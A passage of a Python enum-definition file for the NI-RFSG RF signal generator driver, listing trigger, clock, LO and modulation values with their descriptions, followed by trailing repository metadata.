'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXIe DStar C trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARC',
'value': 'PXIe_DStarC'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'ConfigurationListRepeat': {
'values': [
{
'documentation': {
'description': ' NI-RFSG runs the configuration list continuously.\n'
},
'name': 'CONFIGURATION_LIST_REPEAT_CONTINUOUS',
'value': 0
},
{
'documentation': {
'description': ' NI-RFSG runs the configuration list only once.'
},
'name': 'CONFIGURATION_LIST_REPEAT_SINGLE',
'value': 1
}
]
},
'DeembeddingType': {
'values': [
{
'documentation': {
'description': ' De-embedding is not applied to the measurement. '
},
'name': 'NONE',
'value': 25000
},
{
'documentation': {
'description': ' De-embeds the measurement using only the gain term.'
},
'name': 'SCALAR',
'value': 25001
},
{
'documentation': {
'description': ' De-embeds the measurement using the gain term and the reflection term.'
},
'name': 'VECTOR',
'value': 25002
}
]
},
'DigitalEdgeConfigurationListStepTriggerSource': {
'generate-mappings': True,
'values': [
{
'name': 'PFI0',
'value': 'PFI0'
},
{
'name': 'PFI1',
'value': 'PFI1'
},
{
'name': 'PFI2',
'value': 'PFI2'
},
{
'name': 'PFI3',
'value': 'PFI3'
},
{
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'name': 'PXI_TRIG7',
'value': 'PXI_Trig7'
},
{
'name': 'PXI_STAR',
'value': 'PXI_STAR'
},
{
'name': 'MARKER0_EVENT',
'value': 'Marker0Event'
},
{
'name': 'MARKER1_EVENT',
'value': 'Marker1Event'
},
{
'name': 'MARKER2_EVENT',
'value': 'Marker2Event'
},
{
'name': 'MARKER3_EVENT',
'value': 'Marker3Event'
},
{
'name': 'TIMER_EVENT',
'value': 'TimerEvent'
},
{
'name': 'TRIG_IN',
'value': 'TrigIn'
}
]
},
'DigitalEdgeEdge': {
'values': [
{
'documentation': {
'description': ' Occurs when the signal transitions from low level to high level. \n'
},
'name': 'RISING_EDGE',
'value': 0
},
{
'documentation': {
'description': ' Occurs when the signal transitions from high level to low level. \n'
},
'name': 'FALLING_EDGE',
'value': 1
}
]
},
'DigitalEdgeScriptTriggerIdentifier': {
'generate-mappings': True,
'values': [
{
'name': 'SCRIPT_TRIGGER0',
'value': 'scriptTrigger0'
},
{
'name': 'SCRIPT_TRIGGER1',
'value': 'scriptTrigger1'
},
{
'name': 'SCRIPT_TRIGGER2',
'value': 'scriptTrigger2'
},
{
'name': 'SCRIPT_TRIGGER3',
'value': 'scriptTrigger3'
}
]
},
'DigitalLevelActiveLevel': {
'values': [
{
'documentation': {
'description': ' Trigger when the digital trigger signal is high. \n'
},
'name': 'ACTIVE_HIGH',
'value': 9000
},
{
'documentation': {
'description': ' Trigger when the digital trigger signal is low. \n'
},
'name': 'ACTIVE_LOW',
'value': 9001
}
]
},
'DigitalModulationType': {
'values': [
{
'documentation': {
'description': ' Disables digital modulation.\n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' Specifies that the digital modulation type is frequency-shift keying (FSK).\n'
},
'name': 'FSK',
'value': 4000
},
{
'documentation': {
'description': ' Specifies that the digital modulation type is on-off keying (OOK).\n'
},
'name': 'OOK',
'value': 4001
},
{
'documentation': {
'description': ' Specifies that the digital modulation type is PSK.\n'
},
'name': 'PSK',
'value': 4002
}
]
},
'DigitalModulationWaveformType': {
'values': [
{
'documentation': {
'description': ' Specifies that the digital modulation waveform type is pseudorandom bit sequence (PRBS).\n'
},
'name': 'PRBS',
'value': 5000
},
{
'documentation': {
'description': ' Specifies that the digital modulation waveform type is user defined. To specify the user-defined waveform, call the niRFSG_ConfigureDigitalModulationUserDefinedWaveform function.\n'
},
'name': 'USER_DEFINED',
'value': 5001
}
]
},
'EnableValues': {
'values': [
{
'documentation': {
'description': ' Enabled'
},
'name': 'ENABLE',
'value': 1
},
{
'documentation': {
'description': ' Disabled'
},
'name': 'DISABLE',
'value': 0
}
]
},
'FrequencySettlingUnits': {
'values': [
{
'documentation': {
'description': ' Specifies the value in Frequency Settling is the time to wait after the frequency PLL locks.\n'
},
'name': 'TIME_AFTER_LOCK',
'value': 12000
},
{
'documentation': {
'description': ' Specifies the value in Frequency Settling is the time to wait after all writes to change the frequency occur.\n'
},
'name': 'TIME_AFTER_IO',
'value': 12001
},
{
'documentation': {
'description': ' Specifies the value in Frequency Settling is the minimum frequency accuracy when settling completes. Units are in parts per million (PPM or 1E-6).\n'
},
'name': 'PPM',
'value': 12002
}
]
},
'GenerationMode': {
'values': [
{
'documentation': {
'description': ' Configures the RF signal generator to generate a CW signal. \n'
},
'name': 'CW',
'value': 1000
},
{
'documentation': {
'description': ' Configures the RF signal generator to generate the arbitrary waveform specified by the NIRFSG_ATTR_ARB_SELECTED_WAVEFORM attribute. \n'
},
'name': 'ARB_WAVEFORM',
'value': 1001
},
{
'documentation': {
'description': ' Configures the RF signal generator to generate arbitrary waveforms as directed by the NIRFSG_ATTR_SELECTED_SCRIPT attribute. \n'
},
'name': 'SCRIPT',
'value': 1002
}
]
},
'IqOffsetUnits': {
'values': [
{
'name': 'PERCENT',
'value': 11000
},
{
'name': 'VOLTS',
'value': 11001
}
]
},
'IqOutPortTermConfig': {
'values': [
{
'documentation': {
'description': ' Sets the terminal configuration to differential. \n'
},
'name': 'DIFFERENTIAL',
'value': 15000
},
{
'documentation': {
'description': ' Sets the terminal configuration to single-ended. \n'
},
'name': 'SINGLE_ENDED',
'value': 15001
}
]
},
'LinearInterpolationFormat': {
'values': [
{
'name': 'REAL_AND_IMAGINARY',
'value': 26000
},
{
'name': 'MAGNITUDE_AND_PHASE',
'value': 26001
},
{
'name': 'MAGNITUDE_DB_AND_PHASE',
'value': 26002
}
]
},
'ListStepTriggerType': {
'values': [
{
'documentation': {
'description': ' Generation starts immediately. No trigger is configured. \n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' The data operation does not start until a digital edge is detected. The source of the digital edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_SOURCE attribute, and the active edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_EDGE attribute. \n'
},
'name': 'DIGITAL_EDGE',
'value': 1
}
]
},
'LoSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Uses an internal LO as the LO source. If you specify an internal LO source, the LO is generated within the device itself. \n\n PXIe-5840 with PXIe-5653: If the center frequency is greater than or equal to 3.2 GHz, this configuration uses the PXIe-5653 LO source. For frequencies less than 3.2 GHz, this configuration uses the PXIe-5840 internal LO. \n PXIe-5841 with PXIe-5655: This configuration uses the onboard LO of the PXIe-5655. \n'
},
'name': 'ONBOARD',
'value': 'Onboard'
},
{
'documentation': {
'description': ' Uses an external LO as the LO source. Connect a signal to the LO IN connector on the device and use the NIRFSG_ATTR_UPCONVERTER_CENTER_FREQUENCY attribute to specify the LO frequency. \n'
},
'name': 'LO_IN',
'value': 'LO_In'
},
{
'documentation': {
'description': ' Uses the PXIe-5840 internal LO as the LO source. This value is valid on only the PXIe-5840 with PXIe-5653.'
},
'name': 'SECONDARY',
'value': 'Secondary'
},
{
'documentation': {
'description': ' Uses the same internal LO during some RX and TX operations. In this mode, an internal synthesizer is chosen by the driver and the synthesizer signal is switched to both the RF In and RF Out mixers. This value is valid on only the PXIe-5830/5831/5841 with PXIe-5655. \n'
},
'name': 'SG_SA_SHARED',
'value': 'SG_SA_Shared'
},
{
'documentation': {
'description': ' NI-RFSG internally makes the configuration to share the LO between NI-RFSA and NI-RFSG. This value is valid only on the PXIe-5820/5830/5831/5832/5840/5841. \n'
},
'name': 'AUTOMATIC_SG_SA_SHARED',
'value': 'Automatic_SG_SA_Shared'
}
]
},
'LoadOptions': {
'values': [
{
'documentation': {
'description': ' NI-RFSG loads all the configurations to the session.'
},
'name': 'SKIP_NONE',
'value': 0
},
{
'documentation': {
'description': ' NI-RFSG skips loading the waveform configurations to the session.'
},
'name': 'SKIP_WAVEFORMS',
'value': 1
}
]
},
'LoopBandwidth': {
'values': [
{
'documentation': {
'description': ' Specifies that the device uses a narrow loop bandwidth.\n'
},
'name': 'NARROW',
'value': 0
},
{
'documentation': {
'description': ' Specifies that the device uses a medium loop bandwidth.\n'
},
'name': 'MEDIUM',
'value': 1
},
{
'documentation': {
'description': ' Specifies that the device uses a wide loop bandwidth.\n'
},
'name': 'WIDE',
'value': 2
}
]
},
'MarkerEventOutputBehavior': {
'values': [
{
'documentation': {
'description': ' Specifies the Marker Event output behavior as pulse. \n'
},
'name': 'PULSE',
'value': 23000
},
{
'documentation': {
'description': ' Specifies the Marker Event output behavior as toggle. \n'
},
'name': 'TOGGLE',
'value': 23001
}
]
},
'MarkerEventPulseWidthUnits': {
'values': [
{
'documentation': {
'description': ' Specifies the Marker Event pulse width units as seconds. \n'
},
'name': 'SECONDS',
'value': 22000
},
{
'documentation': {
'description': ' Specifies the Marker Event pulse width units as Sample Clock periods. \n'
},
'name': 'SAMPLE_CLOCK_PERIODS',
'value': 22001
}
]
},
'MarkerEventToggleInitialState': {
'values': [
{
'documentation': {
'description': ' Specifies the initial state of the Marker Event toggle behavior as digital low. \n'
},
'name': 'DIGITAL_LOW',
'value': 21000
},
{
'documentation': {
'description': ' Specifies the initial state of the Marker Event toggle behavior as digital high. \n'
},
'name': 'DIGITAL_HIGH',
'value': 21001
}
]
},
'Module': {
'values': [
{
'name': 'PRIMARY_MODULE',
'value': 13000
},
{
'name': 'AWG',
'value': 13001
},
{
'name': 'LO',
'value': 13002
}
]
},
'OutputPort': {
'values': [
{
'documentation': {
'description': ' Enables the RF OUT port. \n'
},
'name': 'RF_OUT',
'value': 14000
},
{
'documentation': {
'description': ' Enables the I/Q OUT port. \n'
},
'name': 'IQ_OUT',
'value': 14001
},
{
'documentation': {
'description': ' Enables the CAL OUT port. \n'
},
'name': 'CAL_OUT',
'value': 14002
},
{
'documentation': {
'description': ' Enables the I connectors of the I/Q OUT port. \n'
},
'name': 'I_ONLY',
'value': 14003
}
]
},
'OutputSignal': {
'generate-mappings': True,
'values': [
{
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'name': 'PFI0',
'value': 'PFI0'
},
{
'name': 'PFI1',
'value': 'PFI1'
},
{
'name': 'PFI4',
'value': 'PFI4'
},
{
'name': 'PFI5',
'value': 'PFI5'
},
{
'name': 'PXI_STAR',
'value': 'PXI_STAR'
},
{
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'name': 'REF_OUT2',
'value': 'RefOut2'
},
{
'name': 'REF_OUT',
'value': 'RefOut'
},
{
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'OverflowErrorReporting': {
'values': [
{
'documentation': {
'description': ' Configures NI-RFSG to return a warning when an OSP overflow occurs.'
},
'name': 'WARNING',
'value': 1301
},
{
'documentation': {
'description': ' Configures NI-RFSG to not return an error or a warning when an OSP overflow occurs.'
},
'name': 'DISABLED',
'value': 1302
}
]
},
'PPAScriptInheritance': {
'values': [
{
'documentation': {
'description': ' Errors out if different values are detected in the script.\n'
},
'name': 'EXACT_MATCH',
'value': 0
},
{
'documentation': {
'description': ' Uses the minimum value found in the script.\n'
},
'name': 'MINIMUM',
'value': 1
},
{
'documentation': {
'description': ' Uses the maximum value found in the script.\n'
},
'name': 'MAXIMUM',
'value': 2
}
]
},
'PXIChassisClk10': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Do not drive the PXI_CLK10 signal.\n'
},
'name': 'NONE',
'value': 'None'
},
{
'documentation': {
'description': ' Use the highly stable oven-controlled onboard Reference Clock to drive the PXI_CLK10 signal. This value is not valid on the PXIe-5672.\n'
},
'name': 'ONBOARD_CLOCK',
'value': 'OnboardClock'
},
{
'documentation': {
'description': ' Use the clock present at the front panel REF IN connector to drive the PXI_CLK10 signal.\n'
},
'name': 'REF_IN',
'value': 'RefIn'
}
]
},
'PhaseContinuity': {
'values': [
{
'documentation': {
'description': ' Auto'
},
'name': 'AUTO',
'value': -1
},
{
'documentation': {
'description': ' Enabled'
},
'name': 'ENABLE',
'value': 1
},
{
'documentation': {
'description': ' Disabled'
},
'name': 'DISABLE',
'value': 0
}
]
},
'PowerLevelType': {
'values': [
{
'documentation': {
'description': ' Specifies that the power level type is average power. Average power indicates the desired power averaged in time. The driver maximizes the dynamic range by scaling the IQ waveform. If you write more than one waveform, NI-RFSG scales each waveform without preserving the power level ratio between the waveforms. This value is not valid for the PXIe-5820. \n'
},
'name': 'AVERAGE_POWER',
'value': 7000
},
{
'documentation': {
'description': ' Specifies that the power level type is peak power. Peak power indicates the maximum power level of the RF signal averaged over one period of the RF carrier signal frequency (the peak envelope power). This setting requires that the magnitude of the IQ waveform must always be less than or equal to one. When using the peak power level type, the power level of the RF signal matches the specified power level at moments when the magnitude of the IQ waveform equals one. If you write more than one waveform, the relative scaling between waveforms is preserved.\n'
},
'name': 'PEAK_POWER',
'value': 7001
}
]
},
'PulseModulationMode': {
'values': [
{
'documentation': {
'description': ' Provides for a more optimal power output match for the device during the off cycle of the pulse mode operation. \n'
},
'name': 'OPTIMAL_MATCH',
'value': 20000
},
{
'documentation': {
'description': ' Allows for the best on/off power ratio of the pulsed signal. \n'
},
'name': 'HIGH_ISOLATION',
'value': 20001
}
]
},
'RefClockOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Do not export the Reference Clock.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' Export the Reference Clock signal to the REF OUT connector of the device.\n'
},
'name': 'REF_OUT',
'value': 'RefOut'
},
{
'documentation': {
'description': ' Export the Reference Clock signal to the REF OUT2 connector of the device, if applicable.\n'
},
'name': 'REF_OUT2',
'value': 'RefOut2'
},
{
'documentation': {
'description': ' Export the Reference Clock signal to the CLK OUT connector of the device.\n'
},
'name': 'CLK_OUT',
'value': 'ClkOut'
}
]
},
'RefClockRate': {
'values': [
{
'name': '10_MHZ',
'value': 10000000
},
{
'name': 'AUTO',
'value': -1
}
]
},
'RefClockSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Uses the onboard Reference Clock as the clock source.\n PXIe-5830/5831—For the PXIe-5830, connect the PXIe-5820 REF IN connector to the PXIe-3621 REF OUT connector. For the PXIe-5831, connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. \n PXIe-5831 with PXIe-5653—Connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXIe-3622 REF IN connector. \n PXIe-5840 with PXIe-5653—Lock to the PXIe-5653 onboard clock. Connect the REF OUT (10 MHz) connector on the PXIe-5653 to the PXIe-5840 REF IN connector. Configure open NI-RFSA sessions to the device to use NIRFSA_VAL_REF_IN_STR for the PXIe-5840 or NIRFSA_VAL_REF_IN_2_STR for the PXIe-5840 with PXIe-5653. \n PXIe-5841 with PXIe-5655—Lock to the PXIe-5655 onboard clock. Connect the REF OUT connector on the PXIe-5655 to the PXIe-5841 REF IN connector. \n'
},
'name': 'ONBOARD_CLOCK',
'value': 'OnboardClock'
},
{
'documentation': {
'description': ' Use the clock signal present at the front panel RefIn connector as the clock source.\n PXIe-5830/5831—For the PXIe-5830, connect the PXIe-5820 REF IN connector to the PXIe-3621 REF OUT connector. For the PXIe-5831, connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. For the PXIe-5830, lock the external signal to the PXIe-3621 REF IN connector. For the PXIe-5831, lock the external signal to the PXIe-3622 REF IN connector. \n PXIe-5831 with PXIe-5653—Connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXIe-3622 REF IN connector. Lock the external signal to the PXIe-5653 REF IN connector. PXIe-5840 with PXIe-5653—Lock to the PXIe-5653 onboard clock. Connect the REF OUT (10 MHz) connector on the PXIe-5653 to the PXIe-5840 REF IN connector. \n PXIe-5841 with PXIe-5655—Lock to the signal at the REF IN connector on the associated PXIe-5655. Connect the PXIe-5655 REF OUT connector to the PXIe-5841 REF IN connector. \n'
},
'name': 'REF_IN',
'value': 'RefIn'
},
{
'documentation': {
'description': ' Use the PXI_CLK signal, which is present on the PXI backplane, as the clock source.\n'
},
'name': 'PXI_CLK',
'value': 'PXI_CLK'
},
{
'documentation': {
'description': ' Use the clock signal present at the front panel ClkIn connector as the clock source. This value is not valid for the PXIe-5644/5645/5646 or PXIe-5820/5830/5831/5831 with PXIe-5653/5840/5840 with PXIe-5653/5841/5841 with PXIe-5655. \n'
},
'name': 'CLK_IN',
'value': 'ClkIn'
},
{
'documentation': {
'description': ' This value is valid on only the PXIe-5840 with PXIe-5653. NI-RFSG locks the Reference Clock to the clock sourced at the PXIe-5840 REF IN terminal that is already configured by an NI-RFSA session. Connect the PXIe-5840 REF OUT connector to the PXIe-5653 REF IN connector. Configure open NI-RFSA sessions to the device to use NIRFSA_VAL_REF_IN_STR for the PXIe-5840 or NIRFSA_VAL_ONBOARD_CLOCK_STR for the PXIe-5840 with PXIe-5653. \n'
},
'name': 'REF_IN_2',
'value': 'RefIn2'
},
{
'documentation': {
'description': ' This value is valid on only the PXIe-5831 with PXIe-5653 and the PXIe-5840 with PXIe-5653. PXIe-5831 with PXIe-5653—NI-RFSG configures the PXIe-5653 to export the Reference clock and configures the PXIe-5820 and PXIe-3622 to use NIRFSG_VAL_PXI_CLK_STR as the Reference Clock source. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXI chassis REF IN connector. \n PXIe-5840 with PXIe-5653—NI-RFSG configures the PXIe-5653 to export the Reference Clock, and configures the PXIe-5840 to use NIRFSG_VAL_PXI_CLK_STR. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXI chassis REF IN connector. For best performance, configure all other devices in the system to use NIRFSG_VAL_PXI_CLK_STR as the Reference Clock source. \n'
},
'name': 'PXI_CLK_MASTER',
'value': 'PXI_ClkMaster'
}
]
},
'RelativeTo': {
'values': [
{
'name': 'START_OF_WAVEFORM',
'value': 8000
},
{
'name': 'CURRENT_POSITION',
'value': 8001
}
]
},
'ResetOptions': {
'values': [
{
'documentation': {
'description': ' NI-RFSG resets all the configurations.'
},
'name': 'SKIP_NONE',
'value': 0
},
{
'documentation': {
'description': ' NI-RFSG skips resetting the waveform configurations.'
},
'name': 'SKIP_WAVEFORMS',
'value': 1
},
{
'documentation': {
'description': ' NI-RFSG skips resetting the scripts.'
},
'name': 'SKIP_SCRIPTS',
'value': 2
},
{
'documentation': {
'description': ' NI-RFSG skips resetting the de-embeding tables.'
},
'name': 'SKIP_DEEMBEDING_TABLES',
'value': 8
}
]
},
'ResetWithOptionsStepsToOmit': {
'values': [
{
'name': 'NONE',
'value': 0
},
{
'name': 'WAVEFORMS',
'value': 1
},
{
'name': 'SCRIPTS',
'value': 2
},
{
'name': 'ROUTES',
'value': 4
},
{
'name': 'DEEMBEDDING_TABLES',
'value': 8
}
]
},
'RfInLoExportEnabled': {
'values': [
{
'name': 'UNSPECIFIED',
'value': -2
},
{
'name': 'DISABLE',
'value': 0
},
{
'name': 'ENABLE',
'value': 1
}
]
},
'RoutedSignal': {
'values': [
{
'name': 'CONFIGURATION_LIST_STEP_TRIGGER',
'value': 6
},
{
'name': 'CONFIGURATION_SETTLED_EVENT',
'value': 7
},
{
'name': 'DONE_EVENT',
'value': 5
},
{
'name': 'MARKER_EVENT',
'value': 2
},
{
'name': 'REF_CLOCK',
'value': 3
},
{
'name': 'SCRIPT_TRIGGER',
'value': 1
},
{
'name': 'STARTED_EVENT',
'value': 4
},
{
'name': 'START_TRIGGER',
'value': 0
}
]
},
'SParameterOrientation': {
'values': [
{
'name': 'PORT1_TOWARDS_DUT',
'value': 24000
},
{
'name': 'PORT2_TOWARDS_DUT',
'value': 24001
}
]
},
'ScriptTriggerType': {
'values': [
{
'documentation': {
'description': ' Setting trigger attributes to this value specifies that no trigger is configured. Signal generation starts immediately. \n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' The data operation does not start until a digital edge is detected. The source of the digital edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_SCRIPT_TRIGGER_SOURCE attribute, and the active edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_SCRIPT_TRIGGER_EDGE attribute. \n'
},
'name': 'DIGITAL_EDGE',
'value': 1
},
{
'documentation': {
'description': ' The data operation does not start until a digital level is detected. The source of the digital level is specified in the NIRFSG_ATTR_DIGITAL_LEVEL_SCRIPT_TRIGGER_SOURCE attribute, and the active level is specified in the NIRFSG_ATTR_DIGITAL_LEVEL_SCRIPT_TRIGGER_ACTIVE_LEVEL attribute. \n'
},
'name': 'DIGITAL_LEVEL',
'value': 8000
},
{
'documentation': {
'description': ' The data operation does not start until a software event occurs. You may create a software event by calling the niRFSG_SendSoftwareEdgeTrigger function. \n'
},
'name': 'SOFTWARE',
'value': 2
}
]
},
'SelfCalibrateRangeStepsToOmit': {
'values': [
{
'name': 'OMIT_NONE',
'value': 0
},
{
'name': 'LO_SELF_CAL',
'value': 1
},
{
'name': 'POWER_LEVEL_ACCURACY',
'value': 2
},
{
'name': 'RESIDUAL_LO_POWER',
'value': 4
},
{
'name': 'IMAGE_SUPPRESSION',
'value': 8
},
{
'name': 'SYNTHESIZER_ALIGNMENT',
'value': 16
}
]
},
'SignalIdentifier': {
'generate-mappings': True,
'values': [
{
'name': 'NONE',
'value': ''
},
{
'name': 'SCRIPT_TRIGGER0',
'value': 'scriptTrigger0'
},
{
'name': 'SCRIPT_TRIGGER1',
'value': 'scriptTrigger1'
},
{
'name': 'SCRIPT_TRIGGER2',
'value': 'scriptTrigger2'
},
{
'name': 'SCRIPT_TRIGGER3',
'value': 'scriptTrigger3'
},
{
'name': 'MARKER0',
'value': 'marker0'
},
{
'name': 'MARKER1',
'value': 'marker1'
},
{
'name': 'MARKER2',
'value': 'marker2'
},
{
'name': 'MARKER3',
'value': 'marker3'
}
]
},
'StartTriggerType': {
'values': [
{
'documentation': {
'description': ' Setting trigger attributes to this value specifies that no trigger is configured. \n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' The data operation does not start until a digital edge is detected. The source of the digital edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_SOURCE attribute, and the active edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_EDGE attribute. \n'
},
'name': 'DIGITAL_EDGE',
'value': 1
},
{
'documentation': {
'description': ' The data operation does not start until a software event occurs. You may create a software event by calling the niRFSG_SendSoftwareEdgeTrigger function. \n'
},
'name': 'SOFTWARE',
'value': 2
},
{
'documentation': {
'description': ' Data operation does not start until the endpoint reaches a threshold specified in the NIRFSG_ATTR_P2P_ENDPOINT_FULLNESS_START_TRIGGER_LEVEL attribute. \n'
},
'name': 'P2_P_ENDPOINT_FULLNESS',
'value': 3
}
]
},
'TriggerSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PFI 2 on the front panel DDC connector.\n'
},
'name': 'PFI2',
'value': 'PFI2'
},
{
'documentation': {
'description': ' PFI 3 on the front panel DDC connector.\n'
},
'name': 'PFI3',
'value': 'PFI3'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXI trigger line 7.\n'
},
'name': 'PXI_TRIG7',
'value': 'PXI_Trig7'
},
{
'documentation': {
'description': ' PXI Star trigger line. This value is not valid on the PXIe-5644/5645/5646.\n'
},
'name': 'PXI_STAR',
'value': 'PXI_STAR'
},
{
'documentation': {
'description': ' PXIe DStar B trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841. \n'
},
'name': 'PXIE_DSTARB',
'value': 'PXIe_DStarB'
},
{
'documentation': {
'description': ' Sync Start trigger line.'
},
'name': 'SYNC_START_TRIGGER',
'value': 'Sync_Start'
},
{
'documentation': {
'description': ' Sync script trigger line.'
},
'name': 'SYNC_SCRIPT_TRIGGER',
'value': 'Sync_Script'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_IN',
'value': 'TrigIn'
}
]
},
'UpconverterFrequencyOffsetMode': {
'values': [
{
'documentation': {
'description': ' NI-RFSG places the upconverter center frequency outside of the signal bandwidth if the NIRFSG_ATTR_SIGNAL_BANDWIDTH attribute has been set and can be avoided. '
},
'name': 'AUTO',
'value': -1
},
{
'documentation': {
'description': ' NI-RFSG places the upconverter center frequency outside of the signal bandwidth if the NIRFSG_ATTR_SIGNAL_BANDWIDTH attribute has been set and can be avoided. NI-RFSG returns an error if unable to avoid the specified signal bandwidth, or if the NIRFSG_ATTR_SIGNAL_BANDWIDTH attribute has not been set. '
},
'name': 'ENABLE',
'value': 1
},
{
'documentation': {
'description': ' NI-RFSG uses the offset that you specified with the NIRFSG_ATTR_UPCONVERTER_FREQUENCY_OFFSET or NIRFSG_ATTR_UPCONVERTER_CENTER_FREQUENCY attributes. '
},
'name': 'USER_DEFINED',
'value': 5001
}
]
},
'WriteWaveformBurstDetectionMode': {
'values': [
{
'documentation': {
'description': ' NI-RFSG automatically detects the burst start and burst stop locations by analyzing the waveform.'
},
'name': 'AUTO',
'value': -1
},
{
'documentation': {
'description': ' User sets the burst detection parameters.'
},
'name': 'MANUAL',
'value': 0
}
]
},
'YigMainCoil': {
'values': [
{
'documentation': {
'description': ' Adjusts the YIG main coil for an underdampened response. \n'
},
'name': 'SLOW',
'value': 0
},
{
'documentation': {
'description': ' Adjusts the YIG main coil for an overdampened response. \n'
},
'name': 'FAST',
'value': 1
}
]
}
}
| 34.090381 | 1,071 | 0.40013 | 4,854 | 64,499 | 5.230326 | 0.129378 | 0.174886 | 0.055538 | 0.049551 | 0.652395 | 0.59922 | 0.556759 | 0.517922 | 0.477982 | 0.425713 | 0 | 0.039258 | 0.492907 | 64,499 | 1,891 | 1,072 | 34.108408 | 0.736662 | 0 | 0 | 0.350079 | 0 | 0.019038 | 0.4441 | 0.034373 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1591fda0bf27adaef74f6f31a6d8012b1ea509fa | 676 | py | Python | utilities/calculate_missing_diffs.py | SafeBreach-Labs/Back2TheFuture | 39b5eaf289e694aa9cae1bd26fd1f35b0d4dd0c3 | [
"BSD-3-Clause"
] | 84 | 2021-08-07T02:39:50.000Z | 2022-03-18T13:20:43.000Z | utilities/calculate_missing_diffs.py | SafeBreach-Labs/Back2TheFuture | 39b5eaf289e694aa9cae1bd26fd1f35b0d4dd0c3 | [
"BSD-3-Clause"
